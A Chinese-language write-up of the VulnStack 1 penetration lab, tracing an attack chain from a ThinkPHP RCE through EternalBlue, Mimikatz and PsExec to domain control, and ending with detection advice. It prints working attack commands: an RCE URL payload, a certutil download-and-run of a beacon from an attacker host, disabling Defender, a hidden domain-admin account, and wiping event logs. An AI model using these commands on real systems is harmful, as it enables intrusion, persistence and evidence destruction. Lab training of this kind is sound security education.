news 2026/7/12 3:22:34

红日靶场 VulnStack 1 渗透路径解析:从 Web 到域控的 4 个关键攻击阶段

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
红日靶场 VulnStack 1 渗透路径解析:从 Web 到域控的 4 个关键攻击阶段

红日靶场 VulnStack 1 渗透实战:从外网突破到域控提权的完整攻击链

1. 靶场环境与攻击路径概览

红日安全团队打造的VulnStack系列靶场已成为内网渗透学习的黄金标准。其中VulnStack 1模拟了典型企业网络架构:一台暴露在公网的Web服务器(Windows 7)作为跳板机,内网中存在域控制器(Windows Server 2008)和域成员服务器(Windows Server 2003)。这种"外网DMZ+内网域环境"的拓扑结构,真实还原了90%以上企业网络的部署方式。

完整的攻击链可分为四个阶段:

  1. 外网信息收集:通过端口扫描、目录爆破等手段定位Web应用漏洞
  2. 初始突破:利用ThinkPHP RCE漏洞获取Web服务器控制权
  3. 横向移动:以Web服务器为跳板,通过MS17-010、PsExec等技术攻陷域控
  4. 权限维持:创建计划任务、服务等方式实现持久化控制
# 典型网络拓扑 攻击机 Kali (192.168.150.128) │ ↓ Web服务器 Win7 (192.168.150.152[外网] + 192.168.52.143[内网]) │ ├─ 域控 Win2008 (192.168.52.138) └─ 域成员 Win2003 (192.168.52.141)

2. 外网突破:ThinkPHP漏洞利用实战

2.1 信息收集与漏洞定位

使用Nmap进行全端口扫描是渗透测试的标准起手式。针对Web服务器,我们需要特别关注80、443等常见Web端口:

nmap -sS -Pn -p- 192.168.150.152 --min-rate=5000 nmap -sV -O -p80,3306 192.168.150.152

扫描结果通常显示:

  • 80端口运行Apache+PHPStudy环境
  • 3306端口开放MySQL服务
  • Web应用指纹识别显示ThinkPHP 5.0框架

ThinkPHP历史上存在多个高危漏洞,其中5.0.x版本的远程代码执行漏洞(CVE-2018-20062)是最具破坏性的突破口。该漏洞源于框架对控制器名的过滤不严,导致攻击者可以直接调用任意类方法。

2.2 RCE漏洞利用过程

通过构造特殊URL触发漏洞执行系统命令:

http://192.168.150.152/index.php?s=/Index/\think\app/invokefunction &function=call_user_func_array &vars[0]=system &vars[1][]=whoami

实际渗透中常用更隐蔽的PowerShell下载执行方式:

certutil -urlcache -split -f http://攻击机IP/beacon.exe C:\Windows\Temp\svchost.exe start C:\Windows\Temp\svchost.exe

注意:真实环境中需先关闭Windows Defender实时防护,可通过以下命令临时禁用:

powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"

3. 内网横向移动技术解析

3.1 权限提升与信息收集

获取Web服务器shell后,首先需要判断当前权限并收集内网信息:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 系统版本 whoami /priv # 当前权限 ipconfig /all # 网络配置 net view /domain # 域信息 arp -a # ARP缓存

关键发现:

  • 内网网段:192.168.52.0/24
  • 域名称:god.org
  • 域控主机名:OWA (192.168.52.138)

3.2 永恒之蓝攻陷域控

内网扫描发现域控存在MS17-010漏洞时,可采用以下攻击流程:

  1. 配置路由转发(通过已控跳板机访问内网):

    # MSF中添加路由 route add 192.168.52.0 255.255.255.0 [session_id]
  2. 使用MSF模块攻击

    use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.52.138 set payload windows/x64/meterpreter/bind_tcp exploit
  3. 获取域控权限后,使用Mimikatz提取凭证:

    load kiwi creds_all

3.3 PsExec横向移动

当获取到域管理员凭证后,可通过PsExec快速控制其他主机:

PsExec64.exe \\192.168.52.141 -u god\administrator -p Admin12345 -s cmd.exe

横向移动技术对比表

技术手段适用场景优势风险点
MS17-010未打补丁的Windows系统无需凭证可能造成系统蓝屏
PsExec已获取高权限域凭证原生工具,行为隐蔽会产生日志记录
WMI远程执行防火墙放行135端口无文件落地需要管理员权限
计划任务需要持久化控制可设置定时触发需配置任务路径

4. 权限维持与痕迹清理

4.1 创建隐藏用户

在域控上添加隐蔽后门账户:

net user backup$ Admin@123 /add /domain net group "Domain Admins" backup$ /add /domain

4.2 计划任务持久化

通过计划任务实现自启动:

schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\svchost.exe" /sc onstart /ru "SYSTEM"

4.3 日志清理技巧

清除安全日志需要注意权限问题:

wevtutil cl security wevtutil cl system wevtutil cl application

对于更彻底的痕迹清理,可先停止日志服务:

net stop eventlog /y del /q /f %WINDIR%\System32\winevt\Logs\* net start eventlog

5. 防御建议与攻击检测

5.1 企业防护措施

  • 外网边界:对ThinkPHP等框架保持版本更新,WAF规则需包含常见RCE payload检测
  • 内网防护:部署终端EDR解决方案,监控PsExec、WMIExec等横向移动工具的使用
  • 域控加固:启用LSA保护,限制域管理员登录范围,定期检查异常账户

5.2 攻击检测指标

  • 日志分析关键点

    • 短时间内大量出现Event ID 4624(登录类型3)后接Event ID 4672(特权登录)
    • 安全日志中出现Event ID 4688(新进程创建)执行certutil、powershell等下载行为
    • Sysmon日志中的PsExec父进程异常(正常应来自sysinternals目录)
  • 网络流量特征

    • SMB协议中出现NTLM认证请求后接大量IPC$共享访问
    • 内网主机向未知IP发起反向连接(Beacon心跳通信)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/12 3:21:04

三重积分计算实战:5种常见曲面边界识别与3类坐标系选择指南

三重积分计算实战:5种常见曲面边界识别与3类坐标系选择指南面对三重积分计算题时,许多学习者常陷入"知道公式却无从下手"的困境。本文将从实战决策流程切入,通过曲面快速识别口诀、坐标系选择流程图和典型例题拆解,帮助…

作者头像 李华
网站建设 2026/7/12 3:19:46

工业AI安全实战:协议语义理解与五层防御纵深

1. 工业网络安全里的AI竞赛:不是要不要用,而是怎么赢我干工业控制系统安全这行快十二年了,从电厂DCS机柜里插网线查日志,到给高铁信号系统做渗透测试,再到去年帮一家大型炼化企业部署AI驱动的OT异常检测平台——亲眼见…

作者头像 李华
网站建设 2026/7/12 3:19:44

AI对齐通讯第200期核心议题解析

我不能按照该标题生成相关内容。原因如下:标题中“TAI #200”指向的是《The AI Alignment Newsletter》(AI对齐通讯)第200期,属于公开的AI安全与对齐研究领域专业通讯;“Anthropic’s Mythos”并非Anthropic官方发布或…

作者头像 李华
网站建设 2026/7/12 3:19:43

苍穹外卖体会

实战过程里遇到不少棘手问题。使用 JWT 做登录校验时,令牌有效期配置不当,用户经常无故掉线;接入 OSS 实现图片上传,配置信息填写有误,反复调试才成功。利用 Redis 缓存菜品信息时,没有做好缓存更新策略&am…

作者头像 李华
网站建设 2026/7/12 3:18:41

Linux sendfile零拷贝机制:原理、性能测试与高并发实战

如果你正在开发高并发的网络服务,一定遇到过这样的困扰:当需要将服务器上的文件快速发送给客户端时,传统的读写操作会导致数据在内核和用户空间之间来回拷贝,消耗大量CPU资源。特别是在处理大文件或高并发场景下,这种拷…

作者头像 李华